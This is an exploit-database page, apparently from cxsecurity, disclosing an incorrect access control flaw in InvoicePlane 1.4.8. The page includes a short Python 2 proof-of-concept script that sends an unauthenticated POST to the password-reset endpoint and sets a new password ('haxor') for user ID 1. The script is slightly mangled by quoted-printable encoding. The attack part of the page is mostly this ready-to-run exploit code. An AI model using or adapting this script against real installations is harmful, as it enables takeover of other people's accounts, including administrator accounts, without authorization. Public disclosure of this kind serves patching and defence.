InvoicePlane 1.4.8 Incorrect Access Control

2016.11.15
Credit: feedersec
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: InvoicePlane v1.4.8 Incorrect Access Control for password reset # Date: 12-11-2016 # Exploit Author: feedersec # Contact: feedersec@gmail.com # Vendor Homepage: https://invoiceplane.com # Software Link: https://invoiceplane.com/download/v1.4.8 # Version: v1.4.8=20 # Tested on: ubuntu 16.04 LTS # Description: An unauthenticated user can POST to=20 # /index.php/sessions/passwordreset setting a new password for any user import urllib2, urllib #set parameters here user_id =3D '1' new_password =3D 'haxor' baseUrl =3D 'http://localhost/' #### data =3D urllib.urlencode({'user_id': user_id,=20 =09=09=09 'new_password' : new_password, =09=09=09 'btn_new_password' : '1'}) req =3D urllib2.Request(baseUrl + 'index.php/sessions/passwordreset', data) response =3D urllib2.urlopen(req)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top